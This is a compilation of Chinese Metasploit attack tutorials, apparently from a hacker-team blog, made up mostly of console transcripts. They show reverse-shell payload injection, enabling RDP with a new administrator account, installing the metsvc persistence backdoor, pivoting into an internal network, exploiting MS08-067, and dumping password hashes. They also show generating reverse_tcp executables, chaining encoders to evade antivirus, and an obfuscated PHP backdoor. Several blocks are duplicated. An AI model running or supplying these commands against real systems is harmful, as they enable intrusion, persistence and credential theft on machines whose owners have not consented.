  4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

msf  post(payload_inject) >
msf  exploit(ms08_067_netapi) > use post/windows/manage/payload_inject
msf  post(payload_inject) >
msf  post(payload_inject) > show options 

Module options (post/windows/manage/payload_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
   LHOST    5.5.5.1                          yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
   PID                                       no        Process Identifier to inject of process to inject payload.
   SESSION                                   yes       The session to run this module on.

msf  post(payload_inject) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf  post(payload_inject) > set LPORT 9999
LPORT => 9999
msf  post(payload_inject) > set TimestampOutput 0
TimestampOutput => 0
msf  post(payload_inject) > set SESSION 5
SESSION => 5
msf  post(payload_inject) > exploit 

[*] Running module against DIS9TEAM-A1
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 1636
[*] Opening process 1636
[*] Generating payload
[*] Allocating memory in procees 1636
[*] Allocated memory at address 0x00780000, for 363 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 1636
[*] Post module execution completed
msf  post(payload_inject) > sessions 

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

msf  post(payload_inject) >

TCP Shell Session

根据目标安装的脚本设置后门。。有auto, ruby, python, perl, bash,LINUX下也行
因为我啥子都木装 所以。。。 你动的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
msf  post(system_session) > show options 

Module options (post/multi/manage/system_session):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  false            yes       Start an Exploit Multi Handler to receive the connection
   LHOST    5.5.5.1          yes       IP of host that will receive the connection from the payload.
   LPORT    4433             no        Port for Payload to connect to.
   SESSION                   yes       The session to run this module on.
   TYPE     auto             yes       Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)

msf  post(system_session) > set HANDLER true
HANDLER => true
msf  post(system_session) > sessions 

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

msf  post(system_session) > set SESSION 5
SESSION => 5
msf  post(system_session) > exploit
[-] Post failed: Msf::OptionValidateError The following options failed to validate: TYPE.
msf  post(system_session) > set TYPE bash
TYPE => bash
msf  post(system_session) > exploit 

[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:4433
[*] Starting the payload handler...
[*] Post module execution completed
msf  post(system_session) > set TYPE python
TYPE => python
msf  post(system_session) > exploit 

[*] Starting exploit multi handler
[-] Job 4 is listening on IP 5.5.5.1 and port 4433
[-] Could not start handler!
[-] A job is listening on the same Port
[*] Post module execution completed
msf  post(system_session) > set LPORT 5555
LPORT => 5555
msf  post(system_session) > exploit 

[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:5555
[*] Starting the payload handler...
[*] Post module execution completed
msf  post(system_session) >
msf  post(system_session) > show options 

Module options (post/multi/manage/system_session):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  false            yes       Start an Exploit Multi Handler to receive the connection
   LHOST    5.5.5.1          yes       IP of host that will receive the connection from the payload.
   LPORT    4433             no        Port for Payload to connect to.
   SESSION                   yes       The session to run this module on.
   TYPE     auto             yes       Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)

msf  post(system_session) > set HANDLER true
HANDLER => true
msf  post(system_session) > sessions 

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

msf  post(system_session) > set SESSION 5
SESSION => 5
msf  post(system_session) > exploit
[-] Post failed: Msf::OptionValidateError The following options failed to validate: TYPE.
msf  post(system_session) > set TYPE bash
TYPE => bash
msf  post(system_session) > exploit 

[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:4433
[*] Starting the payload handler...
[*] Post module execution completed
msf  post(system_session) > set TYPE python
TYPE => python
msf  post(system_session) > exploit 

[*] Starting exploit multi handler
[-] Job 4 is listening on IP 5.5.5.1 and port 4433
[-] Could not start handler!
[-] A job is listening on the same Port
[*] Post module execution completed
msf  post(system_session) > set LPORT 5555
LPORT => 5555
msf  post(system_session) > exploit 

[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:5555
[*] Starting the payload handler...
[*] Post module execution completed
msf  post(system_session) >

pxexploit

看说明:
This module provides a PXE server, running a DHCP and TFTP server.
The default configuration loads a linux kernel and initrd into
memory that reads the hard drive; placing a payload to install
metsvc, disable the firewall, and add a new user metasploit on any
Windows partition seen, and add a uid 0 user with username and
password metasploit to any linux partition seen. The windows user
will have the password p@SSw0rd!123456 (in case of complexity
requirements) and will be added to the administrators group. See
exploit/windows/misc/pxesploit for a version to deliver a specific
payload. Note: the displayed IP address of a target is the address
this DHCP server handed out, not the “normal” IP address the host
uses.
没条件 所以不演示了

自动3389

很简单,进入模块设置帐号密码。 端口。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
msf  post(enable_rdp) > show options 

Module options (post/windows/manage/enable_rdp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ENABLE    true             no        Enable the RDP Service and Firewall Exception.
   FORDWARD  false            no        Forward remote port 3389 to local Port.
   LPORT     3389             no        Local port to fordward remote connection.
   PASSWORD                   no        Password for the user created.
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        The username of the user to create.

msf  post(enable_rdp) > set USERNAME test
USERNAME => test
msf  post(enable_rdp) > set PASSWORD test
PASSWORD => test
msf  post(enable_rdp) > set SESSION 5
SESSION => 5
msf  post(enable_rdp) > exploit 

[*] Enabling Remote Desktop
[*]  RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]  The Terminal Services service is not set to auto, changing it to auto ...
[*]  Opening port in local firewall if necessary
[*] Setting user account for logon
[*]  Adding User: test with Password: test
[*]  Adding User: test to local group 'Remote Desktop Users'
[*]  Adding User: test to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20120322003120_default_5.5.5.3_host.windows.cle_876250.txt
[*] Post module execution completed
msf  post(enable_rdp) >
msf  post(enable_rdp) > show options 

Module options (post/windows/manage/enable_rdp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ENABLE    true             no        Enable the RDP Service and Firewall Exception.
   FORDWARD  false            no        Forward remote port 3389 to local Port.
   LPORT     3389             no        Local port to fordward remote connection.
   PASSWORD                   no        Password for the user created.
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        The username of the user to create.

msf  post(enable_rdp) > set USERNAME test
USERNAME => test
msf  post(enable_rdp) > set PASSWORD test
PASSWORD => test
msf  post(enable_rdp) > set SESSION 5
SESSION => 5
msf  post(enable_rdp) > exploit 

[*] Enabling Remote Desktop
[*] 	RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] 	The Terminal Services service is not set to auto, changing it to auto ...
[*] 	Opening port in local firewall if necessary
[*] Setting user account for logon
[*] 	Adding User: test with Password: test
[*] 	Adding User: test to local group 'Remote Desktop Users'
[*] 	Adding User: test to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20120322003120_default_5.5.5.3_host.windows.cle_876250.txt
[*] Post module execution completed
msf  post(enable_rdp) >

看看3389开了木???

1
2
3
4
msf  post(enable_rdp) > nc -v 5.5.5.3 3389
[*] exec: nc -v 5.5.5.3 3389

Connection to 5.5.5.3 3389 port [tcp/*] succeeded!
msf  post(enable_rdp) > nc -v 5.5.5.3 3389
[*] exec: nc -v 5.5.5.3 3389

Connection to 5.5.5.3 3389 port [tcp/*] succeeded!

开了,你当然也能换其他端口

Inject in Memory

这货很牛B,内存射入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
msf  post(enable_rdp) > use post/windows/manage/multi_meterpreter_inject
msf  post(multi_meterpreter_inject) > set PAYLOAD windows/meterpreter/reverse_tcp
msf  post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf  post(multi_meterpreter_inject) > set LPORT 5624
LPORT => 5624
msf  post(multi_meterpreter_inject) > exploit 

[*] Running module against DIS9TEAM-A1
[*] Starting connection handler at port 5624 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=5.5.5.1 LPORT=5624
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1168
[*] Injecting meterpreter into process ID 1168
[*] Allocated memory at address 0x00780000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1168
[*] Meterpreter session 6 opened (5.5.5.1:5624 -> 5.5.5.3:1064) at 2012-03-22 00:40:19 +0800
[*] Post module execution completed
msf  post(multi_meterpreter_inject) >
msf  post(enable_rdp) > use post/windows/manage/multi_meterpreter_inject
msf  post(multi_meterpreter_inject) > set PAYLOAD windows/meterpreter/reverse_tcp
msf  post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf  post(multi_meterpreter_inject) > set LPORT 5624
LPORT => 5624
msf  post(multi_meterpreter_inject) > exploit 

[*] Running module against DIS9TEAM-A1
[*] Starting connection handler at port 5624 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=5.5.5.1 LPORT=5624
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1168
[*] Injecting meterpreter into process ID 1168
[*] Allocated memory at address 0x00780000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1168
[*] Meterpreter session 6 opened (5.5.5.1:5624 -> 5.5.5.3:1064) at 2012-03-22 00:40:19 +0800
[*] Post module execution completed
msf  post(multi_meterpreter_inject) >

成功获得了SHELL,

metsvc door

作为系统服务启动的
首先获得工具:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
brk@Dis9Team:/tmp$ wget http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
--2012-03-22 00:54:49--  http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
正在解析主机 www.phreedom.org... 66.45.226.226
正在连接 www.phreedom.org|66.45.226.226|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度: 55871 (55K) [application/zip]
正在保存至: “metsvc-1.0.zip”

100%[======================================>] 55,871      46.2K/s   花时 1.2s  

2012-03-22 00:54:52 (46.2 KB/s) - 已保存 “metsvc-1.0.zip” [55871/55871])

brk@Dis9Team:/tmp$ unzip metsvc-1.0.zip
Archive:  metsvc-1.0.zip
   creating: metsvc-1.0/
  inflating: metsvc-1.0/ChangeLog.txt
  inflating: metsvc-1.0/metsvc-server.exe
  inflating: metsvc-1.0/metsvc.exe
  inflating: metsvc-1.0/README.txt
   creating: metsvc-1.0/src/
  inflating: metsvc-1.0/src/Makefile
  inflating: metsvc-1.0/src/metsvc-server.cpp
  inflating: metsvc-1.0/src/metsvc.cpp
  inflating: metsvc-1.0/src/metsvc.h
  inflating: metsvc-1.0/test.rb
brk@Dis9Team:/tmp$ cd metsvc-1.0/
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/met
metcli.exe         meterpreter.php    metsrv.x64.dll     metsvc-server.exe
meterpreter.jar    metsrv.dll         metsvc.exe
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/metsrv.dll .
brk@Dis9Team:/tmp/metsvc-1.0$ ls
ChangeLog.txt  metsvc.exe         README.txt  test.rb
metsrv.dll     metsvc-server.exe  src
brk@Dis9Team:/tmp/metsvc-1.0$
brk@Dis9Team:/tmp$ wget http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
--2012-03-22 00:54:49--  http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
正在解析主机 www.phreedom.org... 66.45.226.226
正在连接 www.phreedom.org|66.45.226.226|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度: 55871 (55K) [application/zip]
正在保存至: “metsvc-1.0.zip”

100%[======================================>] 55,871      46.2K/s   花时 1.2s  

2012-03-22 00:54:52 (46.2 KB/s) - 已保存 “metsvc-1.0.zip” [55871/55871])

brk@Dis9Team:/tmp$ unzip metsvc-1.0.zip
Archive:  metsvc-1.0.zip
   creating: metsvc-1.0/
  inflating: metsvc-1.0/ChangeLog.txt
  inflating: metsvc-1.0/metsvc-server.exe
  inflating: metsvc-1.0/metsvc.exe
  inflating: metsvc-1.0/README.txt
   creating: metsvc-1.0/src/
  inflating: metsvc-1.0/src/Makefile
  inflating: metsvc-1.0/src/metsvc-server.cpp
  inflating: metsvc-1.0/src/metsvc.cpp
  inflating: metsvc-1.0/src/metsvc.h
  inflating: metsvc-1.0/test.rb
brk@Dis9Team:/tmp$ cd metsvc-1.0/
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/met
metcli.exe         meterpreter.php    metsrv.x64.dll     metsvc-server.exe
meterpreter.jar    metsrv.dll         metsvc.exe
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/metsrv.dll .
brk@Dis9Team:/tmp/metsvc-1.0$ ls
ChangeLog.txt  metsvc.exe         README.txt  test.rb
metsrv.dll     metsvc-server.exe  src
brk@Dis9Team:/tmp/metsvc-1.0$

然后上传:

1
2
3
4
5
6
7
8
9
10
meterpreter > upload /tmp/metsvc-1.0/metsvc.exe c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/\metsvc.exe
meterpreter > upload /tmp/metsvc-1.0/metsvc-server.exe c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/\metsvc-server.exe
meterpreter > upload /tmp/metsvc-1.0/metsrv.dll c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/\metsrv.dll
meterpreter >
meterpreter > upload /tmp/metsvc-1.0/metsvc.exe c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/\metsvc.exe
meterpreter > upload /tmp/metsvc-1.0/metsvc-server.exe c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/\metsvc-server.exe
meterpreter > upload /tmp/metsvc-1.0/metsrv.dll c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/\metsrv.dll
meterpreter >

安装服务:

1
2
3
4
5
6
7
8
9
10
11
12
13
meterpreter > shell
Process 2632 created.
Channel 6 created.
Microsoft Windows XP [�汾 5.1.2600]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.

c:\windows>metsvc.exe install-service
metsvc.exe install-service
 * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

c:\windows>
meterpreter > shell
Process 2632 created.
Channel 6 created.
Microsoft Windows XP [�汾 5.1.2600]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.

c:\windows>metsvc.exe install-service
metsvc.exe install-service
 * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

c:\windows>

然后你懂的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf  exploit(handler) > set LPORT 31337
LPORT => 31337
msf  exploit(handler) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  exploit(handler) > exploit 

[-] Exploit exception: Setting ExitOnSession to false requires running as a job (exploit -j)
[*] Started bind handler
[*] Meterpreter session 8 opened (5.5.5.1:33670 -> 5.5.5.3:31337) at 2012-03-22 01:02:03 +0800

meterpreter >
msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf  exploit(handler) > set LPORT 31337
LPORT => 31337
msf  exploit(handler) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  exploit(handler) > exploit 

[-] Exploit exception: Setting ExitOnSession to false requires running as a job (exploit -j)
[*] Started bind handler
[*] Meterpreter session 8 opened (5.5.5.1:33670 -> 5.5.5.3:31337) at 2012-03-22 01:02:03 +0800

meterpreter >

结束语

还有很多东西想介绍 但是没时间搭建环境 所以写道这里

metasploit的pivot实例详解

first,不管怎么样,各种方式,首先获得一个shell,system权限的shell,建立meterpter的session
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeManageVolumePrivilege

meterpreter > getsystem
…got system (via technique 1).

然后看下本地的ip神马的

meterpreter > ipconfig /all

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface 65539
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:cd:69:e8
MTU          : 1500
IPv4 Address : 192.168.0.116
IPv4 Netmask : 255.255.255.0

然后获取本地网络分配情况

meterpreter > run get_local_subnets
Local subnet: 192.168.0.0/255.255.255.0

ok,咱们开始添加本地网关和ip地址,在session里面创建虚拟路由功能

meterpreter > run autoroute -h
Get a list of local subnets based on the host’s routes
USAGE: run get_local_subnets

OPTIONS:

-D        Delete all routes (does not require a subnet)
-d        Delete the named route instead of adding it
-h        Help and usage
-n <opt>  Netmask (IPv4, for example, 255.255.255.0
-p        Print active routing table. All other options are ignored
-s <opt>  Subnet (IPv4, for example, 10.10.10.0)

不多解释,大家都能看懂,我们开始添加IP地址和子网掩码

meterpreter > run autoroute -s 192.168.0.0/24
[*] Adding a route to 192.168.0.0/255.255.255.0…
[+] Added route to 192.168.0.0/255.255.255.0 via xxx.24y.x7.50
[*] Use the -p option to list all active routes

自动分配IP,然后查看一下分配的IP情况

meterpreter > run autoroute -p

Active Routing Table
====================

Subnet             Netmask            Gateway
——             ——-            ——-
192.168.0.0        255.255.255.0      Session 1

创建 成功,当前session成功创建虚拟路由客户端,后台运行当前session

meterpreter >
Background session 1? [y/N]

扫描当前目标网络的机器smb信息,借此来判断开放smb信息机器的一些信息

msf  auxiliary(smb_version) > run

[*] Scanned 029 of 256 hosts (011% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 079 of 256 hosts (030% complete)
[*] 192.168.0.101:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:AV-PC) (domain:AV-PC)
[*] 192.168.0.100:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:USERCHI-4JSMNL8) (domain:WORKGROUP)
[*] Scanned 103 of 256 hosts (040% complete)
[*] 192.168.0.116:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:MILSEC) (domain:WORKGROUP)
[*] 192.168.0.127:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:MILSEC) (domain:WORKGROUP)
[*] 192.168.0.128:445 is running Windows 2000 Service Pack 4 with MS05-010+ (language: Chinese – Traditional) (name:J86PG7C8XQQPZDD) (domain:雨薇在线)
[*] Scanned 128 of 256 hosts (050% complete)
[*] Scanned 154 of 256 hosts (060% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 205 of 256 hosts (080% complete)
[*] Scanned 231 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

人品爆发了,内网有一台Windows 2000server的机器,试试08067,估计杀他还是没问题的

msf  exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set LHOST 192.168.0.0
LHOST => 192.168.0.0
msf  exploit(ms08_067_netapi) > set LPORT 9988
LPORT => 9988
msf  exploit(ms08_067_netapi) > set RHOST 192.168.0.128
RHOST => 192.168.0.128
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on xx.xy.xxy.131:9988
[*] Automatically detecting the target…
[*] Fingerprint: Windows 2000 – Service Pack 4 with MS05-010+ – lang:Chinese – Traditional
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability…
[*] Sending stage (752128 bytes) to yyy.yxy.xyx.154
[*] Meterpreter session 2 opened (xx.xy.xxy.131:9988 -> yyy.yxy.xyx.154:33303) at Sat Mar 24 00:42:30 +0400 2012

meterpreter >

连踩两次狗屎,可以去买彩票了。溢出成功,现在看看ip神马的

meterpreter > ipconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1500
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface 16777219
============
Name         : AMD PCNET Family Ethernet Adapter
Hardware MAC : 00:0c:29:5f:c6:cd
MTU          : 1500
IPv4 Address : 192.168.0.128
IPv4 Netmask : 255.255.255.0

没错,的确是我们的目标机器的内网机器,跟上面的IP是有所不同的吧,

抓hash啊,亲,

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_J86PG7C8XQQPZDD:1001:f1e39dbd0be340d11146fdf88178ba65:be3c0db67905a8e99a381dd109586c17:::
IWAM_J86PG7C8XQQPZDD:1002:2cc6fe6448db8c5f60b62c4796bb3088:2ea4c2826f40da7d5e7d67f001aae9d0:::
TsInternetUser:1000:2d705216336fe3b01ff234d2818fa846:0d834ee5cfa4b88ac3978002e3acadec:::

后台运行看一下

meterpreter >
Background session 2? [y/N]
msf  exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id  Type                   Information                            Connection
—  —-                   ———–                            ———-
1   meterpreter x86/win32  MILSEC\Administrator @ MILSEC          xx.xy.xxy.131:5546 -> xxx.24y.57.50:30310 (192.168.0.116)
2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ J86PG7C8XQQPZDD  xx.xy.xxy.131:9988 -> xxx.24x.148.154:33303 (192.168.0.128)

msf  exploit(ms08_067_netapi) >
亲,两个不同的内网IP和不同的外网IP哦,证明是两台不同的机器通过同一个pivot环境来溢出的,

 

linux 下面的这个是需要root权限来执行的,不然autoroute是会出问题的,Linux的明天再扯,希望这个对大家做内网审计的时候能有一些帮助……

Metasploit 权限提升|metasploit -> meterpreter 一个命令完成提权,一个命令完成3389,犀利的提权工具

攻击

首先我虚拟机的APACHE是以非系统权限启动的

我们来生成一个Door

root@Dis9Team:~$ sudo msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 x > /var/www/door.exe
[sudo] password for brk:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.1.1", "LPORT"=>"4444"}

然后上传到WEB SHELL 服务器 运行,metasploit本地监听

看终端 成功去定了SHELL

你可以用强大的meterpreter会话帮你权限提升,他会自动运行从古到今的本地EXP 360的也有哦:

meterpreter > getuid
Server username: DIS9TEAM-5FA711\apache   ==>不是系统权限
meterpreter > getsystem                   ==>运行一个命令
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM      ==>传说种的溢出
meterpreter >

如果安全了杀毒软件你也可以BYPASS

msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=21 R | ./msfencode -e x86/call4_dword_xor -t raw -c 5 | ./msfencode -e x86/countdown -t raw -c 5 | ./msfencode -e x86/fnstenv_mov -t raw -c 5 | ./msfencode -e x86/jmp_call_additive -t raw -c 5 | ./msfencode -t exe -c 5 > /tmp/5x.exe

如果你嫌弃EXE露点你也可以生成脚本后门:

root@Dis9Team:/tmp/# msfpayload -l | grep php
    php/bind_perl                                    Listen for a connection and spawn a command shell via perl (persistent)
    php/bind_perl_ipv6                               Listen for a connection and spawn a command shell via perl (persistent) over IPv6
    php/bind_php                                     Listen for a connection and spawn a command shell via php
    php/bind_php_ipv6                                Listen for a connection and spawn a command shell via php (IPv6)
    php/download_exec                                Download an EXE from an HTTP URL and execute it
    php/exec                                         Execute a single system command
    php/meterpreter/bind_tcp                         Listen for a connection, Run a meterpreter server in PHP
    php/meterpreter/reverse_tcp                      Reverse PHP connect back stager with checks for disabled functions, Run a meterpreter server in PHP
    php/meterpreter_reverse_tcp                      Connect back to attacker and spawn a Meterpreter server (PHP)
    php/reverse_perl                                 Creates an interactive shell via perl
    php/reverse_php                                  Reverse PHP connect back shell with checks for disabled functions
    php/shell_findsock                               

msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->

metasploit -> meterpreter  一个命令完成提权,一个命令完成3389,犀利的提权工具

meterpreter高级功能简介

Meterpreter是Metasploit的默认Windows系统下的Shell Code
以前Meterpreter只是Metasploit入侵时短期凑活一下用的
一旦入侵成功后就尽快上传远控

但是现在新一代的Meterpreter变得异常强大
我甚至感觉许多情况下用Meterpreter进行操作就足够了

特色功能1:快速提权
Getsystem命令快速提权
实在没有比这个简单的了
一条指令你就拥有了System权限

Meterpreter会自己尝试用多种方法让你获得System权限

特色功能2:Hashdump
运行这个命令:run post/windows/gather/hashdump
一条命令你就能够获得Windows的Sam 数据库里的内容
就是经过加密的用户名和密码

特色功能3:直接打开3389
Getgui命令是Meterpreter新添加的命令
这个命令能够让你轻松的在目标系统上打开3389远程管理
这条命令有两个用法:run getgui -e(仅仅是打开远程管理)
run getgui -u hacker -p s3cr3t(打开远程管理并且创造一个新的用户名为Hacker密码为s3cr3t的帐号)

特色功能4:网络嗅探
Meterpreter拥有非常强大的网络嗅探能力
它能够不在目标系统上安装任何驱动的情况下进行网络嗅探
而且它还聪明到了自己的流量要被忽略掉

特色功能5:网络中继
往往入侵局域网黑客碰到的最大困难时无法穿过NAT
现在有了Meterpreter就轻松了
Meterpreter能够让一台你已经入侵的电脑变成中继,来入侵同一个局域网里的其他电脑

特色功能6:截屏
截屏看到对方电脑上正在做什么
这个功能很容易理解吧

最好的Metasploit教程:http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training